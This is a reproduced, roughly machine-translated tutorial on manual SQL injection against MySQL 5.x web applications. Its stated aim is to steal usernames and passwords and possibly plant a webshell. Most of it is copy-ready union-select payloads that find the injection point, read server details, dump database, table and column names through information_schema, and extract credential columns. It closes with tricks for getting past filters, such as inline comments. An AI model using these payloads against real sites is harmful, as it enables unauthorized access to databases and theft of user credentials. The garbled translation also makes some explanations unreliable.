Reproduced MySQL database 5.X version basic manual injection Summary

MySQL database 5.X version basic manual injection Summary

According to my understanding of MySQL, when injected, can basically through the explosion, blind, error three ways to obtain the user name and password, in the case of sufficient authority, you can also directly through the SQL statement to insert and export our sentence webshell.

When we get a MySQL injection point, we need to judge the MySQL version. Because when the MySQL version is less than 4.0, the Union Select Union query is not supported, when the MySQL version is greater than 5.0, there is a default database Information_schema, which contains all the database information (such as table name, column name, corresponding permissions, etc.), Through this database, we can query across the library, explode the list. Now in general, MySQL is more than 4.0, so we can rest assured that with the joint query it.

For the injection of MySQL, there are probably these ideas:
1. Determine if the injection point has Read and write permissions, if any, then you can directly read the configuration file, user name password, etc., when the MAGIC_QUOTES_GPC is off, you can also directly export a sentence webshell.
When the MAGIC_QUOTES_GPC is on, ' it will be turned into a ', and the absolute path to write the export must be ' enclosed ', so the egg hurts.
2. When there is no read and write permission, judge the MySQL version, more than 5.0 when the user name password can be obtained by explosion, 5.0 or more or more than 5.0 can not explode (such as restricting the INFORMATION_SCHEMA database), you may obtain the user name password through the blind.
Blind Note: My understanding is that the correct query is judged by the correctness of the return page, which is similar to the injection of the Access database, which is a guess.
3. Sometimes, because a parameter may execute multiple query statements, which results in the number of fields can not be found, and there is no digital echo, if the server turned on the MySQL error echo, but also through error injection from the error message to get what we want to know.
For the time being I think of these, blind and error The two ways I am not too familiar, will not say. Here, I will simply introduce the 5.X version of the MySQL database exploded explosion content.


Step one: Determine the injection point
Not much to say. Single quotes, and 1=1, and 1=2.


Step two: ORDER BY and Union Select
The number of fields is detected by the order by N, and then the Union is queried.
And1=2 Union Select 1,2,3,4...,n--
First and 1=2 error, with single quotation marks or in front of the argument to add a "-" also OK
Here and access, you can not add the "from table name", the last side of the "-" is an annotation, comment out the following statements, to prevent errors, and "/*" can also be done, or do not add
Access does not support comment characters, MySQL and MSSQL support
These two don't say much.


Step three: Find out the basic information
After getting the digital echo, replace the corresponding digits with the information we want to query, such as the display bit is 3
And1=2 Union Select 1,2,version (), 4...,n--
Describes several common functions:
1. Version ()--mysql versions
2. User ()-username
3. Database ()--Data name
4. @ @datadir--Database path
5. @ @version_compile_os-os version
We can find out the corresponding information by putting the corresponding function in the display bit
Here are a few more useful functions:
1. Concat (str1,str2,...) --no delimiter to concatenate strings
2. Concat_ws (SEPARATOR,STR1,STR2,...) --string with delimited connection
3. Group_concat (STR1,STR2,...) --concatenate all the strings of a group and separate each piece of data with a comma
Say the more abstract, in fact, do not need to understand the details, know that the three functions can be found all the information at once on the line.
For example: Concat (Version (), 0x3a,user (), 0x3a,database (), 0x3a,@ @datadir, 0x3a,@ @verion_compile_os)
Concat_ws (0x3a,version (), User (), database (), @ @datadir, @ @verion_compile_os)
Group_concat (Version (), 0x3a,user (), 0x3a,database (), 0x3a,@ @datadir, 0x3a,@ @verion_compile_os)
0X3A is the hex of ":", where it is used as a delimiter, without it, the things found are connected to a piece of
In the actual investigation, there may be some errors, such as @ @verion_compile_os This function is often wrong, remove it. = =
For MySQL function can Baidu, or view MySQL official manual http://dev.mysql.com/doc/


Step four: Burst the explosion of the user name password
There are a lot of ways to explode, and I'll tell you a few of the things I know, from the most "gentle" to the most "savage".

The first type: Check the list
1. and 1=2 Union select 1,2,table_name,4 from (SELECT * from information_schema.tables where table_schema= library name hex Limit n,1 ) T limit
2. and 1=2 Union select 1,2,column_name,4 from (SELECT * from information_schema.columns where table_name= table names hexadecimal and tables _schema= Library name hex limit n,1) t limit
3. And 1=2 Union Select 1, 2, column name, 4 from table name

Here, change the value of N to find a table name, a column name
This method is older, the specific principle of those I do not quite understand, especially the T and the back of the limit 1, understand the line

The second type: high-level check list
1. and 1=2 Union select 1,2,schema_name,4 from Information_schema.schemata limit n,1
2. and 1=2 Union select 1,2,table_name,4 from Information_schema.tables where table_schema= the hexadecimal limit of the library name to check n,1
3. And 1=2 Union select 1,2,column_name,4 from Information_schema.columns where table_name= the hexadecimal limit of the table name to check n,1

There is a speed-up skill, to check the name of the hexadecimal location of the database fill database (), is table_schema=database (), directly represents the current databases
Find sensitive tables that contain admin, manage, or user-like

The third kind: explode the table to explode the column
1. and 1=2 Union Select 1,2,group_concat (schema_name), 4 from Information_schema.schemata
2. and 1=2 Union SELECT 1,2,GROUP_CONCAT (TABLE_NAME), 4 from Information_schema.tables where table_schema= the hexadecimal of the library name to explode
3. And 1=2 Union Select 1,2,group_concat (column_name), 4 from Information_schema.columns where table_name= the hexadecimal of the table name to explode
4. And 1=2 Union select 1,2,group_concat (column name 1,0x3a, column Name 2), 4 from table name

Distinct is different, that is, to remove the repetition of the contents of the content, do not add, I am accustomed to add
This method is good. By using Group_concat () This function directly burst all the library name, table name, column name, field content, you can improve the speed, easy to find

The fourth type: high-level explosion of the list
1. and 1=2 Union Select 1,2,GROUP_CONCAT (Distinct Table_schema), 4 from Information_schema.columns
2. and 1=2 Union SELECT 1,2,GROUP_CONCAT (DISTINCT table_name), 4 from Information_schema.columns where table_schema= Hexadecimal of the library name to explode
3. And 1=2 Union Select 1,2,GROUP_CONCAT (DISTINCT column_name), 4 from Information_schema.columns where table_name= Hexadecimal of the name of the table to explode
4. And 1=2 Union select 1,2,group_concat (column name 1,0x3a, column Name 2), 4 from table name

All data is obtained from this table of Information_schema.columns because of the introduction of this library from INFORMATION_SCHEMA (http://dev.mysql.com/doc/refman/5.1/zh/ information-schema.html) We can see that from the information_schema.columns this table, we can find all the information, because it is inside, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME This three column has, so we can directly through this table, to find out all the information we need, save the table to change this step, and further improve the speed

In this step, our injection even completed, to find the background to decrypt the landing just. I'll say a few more words.
Or that sentence, the injection of MySQL is very flexible, I summarize only the most basic statement, just a little fur. As for the more advanced, we go to the forum, Baidu find it. For example, we can try these methods when we can't find them successfully using the above statement.
1. When the union select 1,2,3,4 does not appear in the digits, try to replace the numbers with NULL, then try replacing them with numbers or characters, or switch directly to version () to find the one that can be displayed. This seems to be due to different types of variables, I do not understand.
2. Sometimes when there is an inexplicable error (such as a number display bit, and replace the replacement function (such as version () to replace the blank page or error), can not explode, you may try to use Hex () or CONVERT () function to solve the possible coding problems, such as Hex ( Version ()), Unhex (Hex (version ())), convert (version () using latin1), and so on
3. At the time of injection, you can change the space to "+" or "/**/", which is equivalent, because the space will be automatically turned into "%20", looking at a very messy, and after changing seems to have some filtering.
4. In addition, in the face of the site filter, you can consider the size of the conversion bypass. So it is often seen that the injected statements of Daniel are outlandish and unpredictable. Recently saw a perverted bypass method,/*!select*/, the easy to filter things put into the/*!xxx*/, the same can be normal query, that is,/*!select*/=select. If you're not sure, that's/*!select*/. This/*!xxx*/=xxx principle I still do not understand, hope Daniel can explain, ask for help ~

PS: After the last method is, the first three kinds of only do understand.

Reproduced MySQL database 5.X version basic manual injection Summary